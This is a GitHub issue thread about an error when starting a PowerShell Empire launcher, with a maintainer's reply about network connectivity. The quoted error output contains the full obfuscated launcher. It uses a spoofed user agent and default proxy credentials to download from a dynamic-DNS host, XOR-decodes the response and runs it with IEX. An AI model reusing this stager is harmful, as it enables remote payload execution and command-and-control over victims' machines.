### ISSUE TITLE
error while trying to start launcher code in cmd

### ISSUE THREAD

**Issue by necony286** [PowerShellEmpire/Empire#145]
Exception calling "DownloadString" with "1" argument(s): "Unable to connect to
the remote server"
At line:1 char:359
+ $wc=New-ObjECt SYSTeM.NET.WeBClIENt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; T
rident/7.0; rv:11.0) like Gecko';$Wc.HeaDeRs.ADd('User-Agent',$u);$WC.PrOxy = [
SYsTEM.Net.WEbREQUEST]::DeFAuLtWeBPROxy;$Wc.PRoxy.CreDenTIals = [SYsteM.NET.CRE
dEntiaLCAChE]::DEFaULTNEtWORKCredENtIaLS;$K='c20543257e9ce4485b90c19911a0ebbe';
$I=0;[ChAR[]]$B=([cHaR[]]($wC.DoWnlOadSTrInG <<<< ("http://neconianz1.ddns.net:
10000/index.asp")))|%{$_-BXOR$k[$I++%$k.LEngtH]};IEX ($B-joIN'')
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : DotNetMethodException

Invoke-Expression : Cannot bind argument to parameter 'Command' because it is a
n empty string.
At line:1 char:440
+ $wc=New-ObjECt SYSTeM.NET.WeBClIENt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; T
rident/7.0; rv:11.0) like Gecko';$Wc.HeaDeRs.ADd('User-Agent',$u);$WC.PrOxy = [
SYsTEM.Net.WEbREQUEST]::DeFAuLtWeBPROxy;$Wc.PRoxy.CreDenTIals = [SYsteM.NET.CRE
dEntiaLCAChE]::DEFaULTNEtWORKCredENtIaLS;$K='c20543257e9ce4485b90c19911a0ebbe';
$I=0;[ChAR[]]$B=([cHaR[]]($wC.DoWnlOadSTrInG("http://neconianz1.ddns.net:10000/
index.asp")))|%{$_-BXOR$k[$I++%$k.LEngtH]};IEX <<<<  ($B-joIN'')
    + CategoryInfo          : InvalidData: (:) [Invoke-Expression], ParameterB
   indingValidationException
    + FullyQualifiedErrorId : ParameterArgumentValidationErrorEmptyStringNotAl
   lowed,Microsoft.PowerShell.Commands.InvokeExpressionCommand

**Comment by enigma0x3** [comment]
"Unable to connect to remote server" means that the client cannot reach the server at the networking level. I would verify connectivity from the client to the server.
